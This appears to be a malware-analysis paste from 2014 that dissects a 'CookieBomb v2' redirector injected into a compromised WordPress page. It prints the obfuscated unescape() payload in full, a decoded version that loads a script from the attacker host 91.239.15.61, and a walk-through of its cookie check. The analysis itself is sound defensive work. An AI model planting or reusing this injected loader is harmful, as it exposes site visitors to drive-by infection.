
CookieBomb v2 - First Cushion Cookie Flow Step by Step

MalwareMustDie Feb 20th, 2014 709 Never
  1. # MalwareMustDie! ( analyzed by: @unixfreaxjp)
  2. # A real case of new variation of the CookieBomb v2 first cushion spotted, to evade
  3. # the scanner by using the HTML special character unicode (&#nnnn) format.
  4. # The original code wasn't changed and is still being redirected to the currently
  5. # inactive CookieBomb server side on IP: 91.239.15.61
  6. # under interface of below URL:
  7. # h00p://91.239.15.61/google.js // first layer of second cushion script
  8. # h00p://91.239.15.61/g.php     // the infector w/reading referer for malicious traffic
  9. #
  10. # Point:
  11. # - The attempt to evade the scanner for the first cushion of CookieBomb v2 exists.
  12. # - Decoding Guide and step by step of Cookie Debug of this first cushion method are explained,
  13. #
  14. # Reference:
  15. http://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-todays.html
  16. http://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-new.html
  17.  
  18. // Some infection sites use a new obfuscation technique so that automation
  19. // cannot deobfuscate the javascript code of the CookieBomb v2 first cushion code.
  20.  
  21. // Download..
  22.  
  23. --2014-02-21 11:51:36--  http://{REDACTED}/blog/usces-cart/
  24. Resolving {REDACTED} ({REDACTED})... 182.48.26.52
  25. Connecting to {REDACTED}({REDACTED})|182.48.26.52|:80... connected.
  26. HTTP request sent, awaiting response... 200 OK
  27. Length: unspecified [text/html]
  28. Saving to: index.html
  29.  
  30. The network information of this infection:
  31.  
  32. $ ipchk geo 182.48.26.52
  33. -----------------------------------------------------------
  34. ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
  35. -----------------------------------------------------------
  36. Source : geo
  37. IP     : 182.48.26.52
  38. -----------------------------------------------------------
  39. 182.48.26.52|users156.heteml.jp.|9371 | 182.48.0.0/18 | SAKURA | JP | PAPERBOY.CO.JP | PAPERBOY&CO. INC.
  40.  
  41. // This victim is a wordpress site, right after the wp_social_bookmarking_light plugin I think,
  42. // this looks like a Wordpress compromising case to me.
  43. // pic: https://lh5.googleusercontent.com/-io1w9HIb65I/UwcFdacwaBI/AAAAAAAAOow/cb6Mxzv3vps/s912/A100100110.png
  44.  
  45. [...]
  46. <div class='wp_social_bookmarking_light'><div class="wsbl_facebook_like"><fb:like href="http://
  47. {REDACTED}/blog/usces-cart/" send="false" layout="button_count" width="100" show_faces="false" action
  48. ="like" colorscheme="light" font=""></fb:like></div><div class="wsbl_twitter">
  49. <iframe allowtransparency="true" frameborder="0" scrolling="no" src="http://platform.twitter.com/wid
  50. gets/tweet_button.html?url=http%3A%2F%2F{REDACTED}%2Fblog%2Fusces-cart%2F&amp;text=%E3%82%AB%E3%83%B
  51. C%E3%83%88&amp;lang=en&amp;count=horizontal" style="width:130px; height:20px;"></iframe></div></div>
  52. <br class='wp_social_bookmarking_light_clear' /><p>&lt;script language=&#8221;javascript&#8221;&gt;<br />
  53. document.write( unescape( &#8216;%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22
  54. %2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C
  55. %2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F
  56. %6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74
  57. %74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74
  58.  
  59.                                  {REDACTED FOR SAVING SPACE}
  60.  
  61. %7D%0A%0A%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%72%65
  62. %64%69%72%65%63%74%28%29%3B%0A%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74
  63. %27%2C%27%74%72%75%65%27%2C%27%39%39%39%27%29%3B%0A%7D%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E
  64. %0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E
  65. &#8217;));<br />
  66. &lt;/script&gt;</p>
  67. <div class='wp_social_bookmarking_light'><div class="wsbl_facebook_like">
  68. [...]
  69.  
  70. // removed the traps...it's: CookieBomb v2 malicious redirector first cushion
  71.  
  72. <script language=javascript><br />
  73. document.write( unescape('%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%
  74. 2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%
  75. 45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%
  76. 6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%
  77. 2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%
  78. 74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%73%63%72%69%
  79. 70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%66%75%
  80. 6E%63%74%69%6F%6E%20%72%65%64%69%72%65%63%74%28%29%0A%7B%0A%76%61%72%20%74%68%65%63%6F%6F%6B%69%65%20%
  81. 3D%20%72%65%61%64%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%29%3B%0A%69%66%28%21%74%68%
  82. 65%63%6F%6F%6B%69%65%29%0A%7B%0A%20%20%20%20%20%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%
  83. 67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%0A%20%20%
  84. 20%20%20%20%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%
  85. 65%6E%74%28%27%73%63%72%69%70%74%27%29%0A%20%20%20%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%
  86. 72%69%62%75%74%65%28%27%74%79%70%65%27%2C%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%29%0A%
  87. 20%20%20%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%
  88. 22%68%74%74%70%3A%2F%2F%39%31%2E%32%33%39%2E%31%35%2E%36%31%2F%67%6F%6F%67%6C%65%2E%6A%73%22%29%0A%20%
  89. 20%20%20%20%20%20%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%0A%7D%0A%7D%
  90. 0A%0A%66%75%6E%63%74%69%6F%6E%20%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%6E%61%6D%65%2C%76%61%6C%75%65%
  91. 2C%64%61%79%73%29%0A%7B%0A%69%66%20%28%64%61%79%73%29%0A%7B%0A%76%61%72%20%64%61%74%65%20%3D%20%6E%65%
  92. 77%20%44%61%74%65%28%29%3B%0A%64%61%74%65%2E%73%65%74%54%69%6D%65%28%64%61%74%65%2E%67%65%74%54%69%6D%
  93. 65%28%29%2B%28%64%61%79%73%2A%33%36%30%30%2A%33%36%30%30%2A%33%36%30%30%2A%31%30%30%30%29%29%3B%0A%76%
  94. 61%72%20%65%78%70%69%72%65%73%20%3D%20%22%3B%20%65%78%70%69%72%65%73%3D%22%2B%64%61%74%65%2E%74%6F%47%
  95. 4D%54%53%74%72%69%6E%67%28%29%3B%0A%7D%0A%65%6C%73%65%20%76%61%72%20%65%78%70%69%72%65%73%20%3D%20%22%
  96. 22%3B%0A%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%3D%20%6E%61%6D%65%2B%22%3D%22%2B%76%61%6C%75%
  97. 65%2B%65%78%70%69%72%65%73%2B%22%3B%20%70%61%74%68%3D%2F%22%3B%0A%7D%0A%0A%66%75%6E%63%74%69%6F%6E%20%
  98. 72%65%61%64%43%6F%6F%6B%69%65%28%6E%61%6D%65%29%0A%7B%0A%76%61%72%20%6E%61%6D%65%45%51%20%3D%20%6E%61%
  99. 6D%65%20%2B%20%22%3D%22%3B%0A%76%61%72%20%63%61%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%
  100. 2E%73%70%6C%69%74%28%27%3B%27%29%3B%0A%66%6F%72%28%76%61%72%20%69%3D%30%3B%69%20%3C%20%63%61%2E%6C%65%
  101. 6E%67%74%68%3B%69%2B%2B%29%0A%7B%0A%76%61%72%20%63%20%3D%20%63%61%5B%69%5D%3B%0A%77%68%69%6C%65%20%28%
  102. 63%2E%63%68%61%72%41%74%28%30%29%3D%3D%27%20%27%29%20%63%20%3D%20%63%2E%73%75%62%73%74%72%69%6E%67%28%
  103. 31%2C%63%2E%6C%65%6E%67%74%68%29%3B%0A%69%66%20%28%63%2E%69%6E%64%65%78%4F%66%28%6E%61%6D%65%45%51%29%
  104. 20%3D%3D%20%30%29%20%72%65%74%75%72%6E%20%63%2E%73%75%62%73%74%72%69%6E%67%28%6E%61%6D%65%45%51%2E%6C%
  105. 65%6E%67%74%68%2C%63%2E%6C%65%6E%67%74%68%29%3B%0A%7D%0A%72%65%74%75%72%6E%20%6E%75%6C%6C%3B%0A%7D%0A%
  106. 0A%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%72%65%64%69%
  107. 72%65%63%74%28%29%3B%0A%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%2C%
  108. 27%74%72%75%65%27%2C%27%39%39%39%27%29%3B%0A%7D%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%
  109. 2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E'));<br />
  110. </script>
  111.  
  112. // decoded and beautified it a bit, to get the full HTML
  113.  
  114. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  115. <html>
  116.  
  117. <head>
  118.     <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  119.     <script type="text/javascript">
  120.         <!--
  121.         function redirect() {
               // Sample code, as decoded. Injects the second-stage script only when
               // no 'doRedirect' cookie is present (readCookie() returns null in that
               // case). Once window.onload below has stored the cookie, this check
               // short-circuits on later loads for as long as the cookie survives,
               // so the external script is fetched at most once per cookie lifetime.
  122.             var thecookie = readCookie('doRedirect');
  123.             if (!thecookie) {
                       // Appends <script src="http://91.239.15.61/google.js"> to <head>.
                       // These statements carry no semicolons and rely on ASI.
  124.                 var head = document.getElementsByTagName('head')[0]
  125.                 var script = document.createElement('script')
  126.                 script.setAttribute('type', 'text/javascript')
  127.                 script.setAttribute('src', "http://91.239.15.61/google.js")
  128.                 head.appendChild(script)
  129.             }
  130.         }
  131.  
  132.         function createCookie(name, value, days) {
               // Sample code, as decoded. Writes document.cookie as
               // "<name>=<value>[; expires=<GMT date>]; path=/".
               // The only caller (window.onload below) passes days as the string
               // '999'; the multiplication coerces it to a number.
  133.             if (days) {
  134.                 var date = new Date();
                       // NOTE: this is not days-to-milliseconds (that would be
                       // days * 86400 * 1000). 3600*3600*3600*1000 ms is roughly
                       // 1478 years per unit: days = 1 lands in the year 3492 (see the
                       // output further down) and days = 999 exceeds the representable
                       // Date range (+/-8.64e15 ms), so toGMTString() yields "Invalid Date".
  135.                 date.setTime(date.getTime() + (days * 3600 * 3600 * 3600 * 1000));
                       // toGMTString() is the legacy alias of toUTCString().
  136.                 var expires = "; expires=" + date.toGMTString();
                   // Both 'var expires' declarations are hoisted to function scope;
                   // the else branch just assigns the empty string to the same variable.
  137.             } else var expires = "";
  138.             document.cookie = name + "=" + value + expires + "; path=/";
  139.         }
  140.  
  141.         function readCookie(name) {
               // Sample code, as decoded. Returns the value of the cookie called
               // `name`, or null when no ';'-separated part of document.cookie
               // starts with "<name>=" after its leading spaces are stripped.
  142.             var nameEQ = name + "=";
  143.             var ca = document.cookie.split(';');
  144.             for (var i = 0; i < ca.length; i++) {
  145.                 var c = ca[i];
                       // document.cookie joins entries with "; ", hence the trim loop.
  146.                 while (c.charAt(0) == ' ') c = c.substring(1, c.length);
                       // Prefix match: the first entry beginning with "<name>=" wins.
  147.                 if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  148.             }
  149.             return null;
  150.         }
  151.  
  152.         window.onload = function () {
               // Order matters: the cookie check inside redirect() runs BEFORE the
               // cookie is written, so the external script is injected only on a
               // page load where no 'doRedirect' cookie exists yet.
  153.             redirect();
  154.             createCookie('doRedirect', 'true', '999');
  155.         }
  156.          //-->
  157.     </script>
  158. </head>
  159.  
  160. <body>
  161. </body>
  162.  
  163. </html>
  164.  
  165.  
  166. // ======================================
  167. // Understanding how the cookie is formed..
  168. // Assemble the format of created cookie...
  169. // ======================================
  170.  
  171. // on loading in the browser with JavaScript activated, it will call the
  172. // createCookie() function to form the cookie strings below:
  173.  
  174. doRedirect=true; expires=$ExpDateLogic + "; path=/";
  175.  
  176.  
  177. // Checking $ExpDateLogic...
  178. // Firstly, $ExpDateLogic is my term for the code that does
  179. // the assembly of the expiry date of the cookie, below:
  180.  
       // Excerpt of createCookie() from the decoded sample above; `days` is the
       // third argument of that function and `expires` is consumed by the
       // document.cookie assignment that follows it there.
  181.  if (days) {
  182.  var date = new Date();
  183.  date.setTime(date.getTime() + (days * 3600 * 3600 * 3600 * 1000));
  184.  var expires = "; expires=" + date.toGMTString(); }
  185.  
  186. // If we put no "days" then it will burp out the exact "now"
  187. // time/date in GMT, so it is an increment of the current time,
  188. // the value is insignificant for me. PoC:
  189.  
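       // PoC: with days = 0 the offset term is 0, so the expiry string is just
       // the current time in GMT (output shown below).
       // Declared with `var` so the PoC does not create an implicit global.
  190.  var days = 0;
       // The value the else branch of createCookie() would produce...
  191.  var expires = "";
  192.  var date = new Date();
       // ...and the value the if branch produces; the second `var expires`
       // is hoisted to the same binding and simply overwrites the first.
  194.  date.setTime(date.getTime() + (days * 3600 * 3600 * 3600 * 1000));
  195.  var expires = "; expires=" + date.toGMTString();
  197.  document.write(expires);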
  198.  
  199.  
  200. OUTPUT:
  201. ; expires=Fri, 21 Feb 2014 03:45:23 GMT
  202.  
  203. // the above formula won't work to process "999" as days (3600*3600*3600*1000 ms is roughly 1478 years per "day", so 999 "days" is beyond the Date range and the expiry becomes an invalid date).
  204. // even if we push days = 1 the result will be something like:
  205. Sat, 13 Aug 3492 02:18:41 GMT
  206.             ^^^^
  207.  
  208.  
  209. // Assemble again...the created cookie strings...
  210.  
  211. "doRedirect=true; expires=Fri, 21 Feb 2014 03:45:23 GMT; path=/"
  212.  
  213. // Now we have enough materials for further debugging..
  214.  
  215.  
  216. // ======================================
  217. // Understanding how the cookie is checked
  218. // the flag of thecookie
  219. // ======================================
  220.  
  221.  
  222. // to do the redirect the cookie is checked,
  223. // checking was done with the below statement:
  224.  
  225. var thecookie = readCookie('doRedirect');
  226.  
  227. // this shows that readCookie() is used to do the check;
  228. // the value returned into "thecookie" is the important flag.
  229.  
       // Same readCookie() as in the decoded sample above, reformatted: returns the
       // value following "<name>=" in document.cookie, or null when absent.
  230.  function readCookie(name) {
  231.  var nameEQ = name + "=";
  232.  var ca = document.cookie.split(';');
  233.  for (var i = 0; i < ca.length; i++) {
  234.      var c = ca[i];
  235.      while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  236.      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  237.    }  return null; }
  238.  
  239.  
  240. // I reworked it a bit into the below code for debugging,
  241. // use your JS debugger to check the flow yourself
  242.  
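       // Debug harness: readCookie() with document.cookie replaced by the cookie
       // string assembled above, so the check can be stepped through outside a
       // browser. Calling readCookie() before its declaration works because
       // function declarations are hoisted.
  243.  var thecookie = readCookie('doRedirect');
  244.  function readCookie(name)
  245.  {
       // `name` is unused here: the prefix is hardcoded for the debug run.
       // Declared with `var` (the original harness leaked an implicit global).
  246.    var nameEQ = "doRedirect=";
  247.    var docookie = "doRedirect=true; expires=Fri, 21 Feb 2014 03:45:23 GMT; path=/";
  248.    var ca = docookie.split(';');
  249.    for (var i = 0; i < ca.length; i++)
  250.    {
  251.      var c = ca[i];
  252.      while (c.charAt(0) == ' ') c = c.substring(1, c.length);
       // The first part, "doRedirect=true", matches and "true" is returned.
  253.      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  254.    }
  255.    return null;
  256.  }
  257.  document.write(thecookie);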
  258.  
  259. OUTPUT:
  260. true
  261.  
  262. // if you run the above code, the value of thecookie = "true" if you have the right cookie,
  263. // so let's move along: what happens if you had the right cookie..
  264.  
  265. // NEXT!
  266. // Now we go to the "main course"..
  267.  
       // The guarded body of redirect() from the decoded sample, quoted again.
       // The src is written "h00p://" here (defanged by the author); the decoded
       // sample above uses "http://". Runs only when thecookie is null/empty.
  268. if (!thecookie) {
  269.     var head = document.getElementsByTagName('head')[0]
  270.     var script = document.createElement('script')
  271.     script.setAttribute('type', 'text/javascript')
  272.     script.setAttribute('src', "h00p://91.239.15.61/google.js")
  273.     head.appendChild(script)
  274. }
  275.  
  276. // the redirection is guarded by the if (!thecookie) condition.
  277. // Meaning, only if you do NOT have the cookie yet (it is created right after redirect() runs),
  278. // then you have the ticket to access javascript in h00p://91.239.15.61/google.js
  279.  
  280. // The h00p://91.239.15.61/google.js is the second cushion, which will
  281. // check again the validity of your cookie and referer, and then the next infection script
  282. // on h00p://91.239.15.61/google.js
  283. // Please refer to the http://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-new.html
  284.  
  285. ---
  286. #MalwareMustDie!!